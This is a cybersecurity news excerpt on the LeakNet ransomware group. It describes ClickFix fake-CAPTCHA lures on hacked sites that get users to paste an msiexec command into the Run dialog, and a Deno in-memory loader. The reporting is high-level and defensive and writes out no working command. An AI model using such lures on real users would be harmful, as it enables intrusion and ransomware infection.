LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader
LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader
https://thehackernews.com/2026/03/leaknet-ransomware-uses-clickfix-via.html
Publish Date: 2026-03-17 10:34:00
Source Domain: thehackernews.com
The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic delivered through compromised websites as an initial access method.
The use of ClickFix, where users are tricked into manually running malicious commands to address non-existent errors, is a departure from relying on traditional methods for obtaining initial access, such as through stolen credentials acquired from initial access brokers (IABs), ReliaQuest said in a technical report published today.
The second important aspect of these attacks is the use of a staged command-and-control (C2) loader built on the Deno JavaScript runtime to execute malicious payloads directly in memory.
“The key takeaway here is that both entry paths lead to the same repeatable post-exploitation sequence every time,” the cybersecurity company said. “That gives defenders something concrete to work with: known behaviors you can detect and disrupt at each stage, well before ransomware deployment, regardless of how LeakNet got in.”
LeakNet first emerged in November 2024, describing itself as a “digital watchdog” and framing its activities as focused on internet freedom and transparency. According to data captured by Dragos, the group has also targeted industrial entities.
The use of ClickFix to breach victims offers several advantages, the most significant being that it reduces dependence on third-party suppliers, lowers per-victim acquisition cost, and removes the operational bottleneck of waiting for valuable accounts to hit the market.
In these attacks, the legitimate-but-compromised sites are used to serve fake CAPTCHA verification checks that instruct users to copy and paste a “msiexec.exe” command to the Windows Run dialog. The attacks are not confined to a specific industry vertical, instead casting a wide net to infect as many victims as possible.
The development comes as more threat actors are adopting the ClickFix playbook, as it abuses trusted, everyday workflows to entice users…
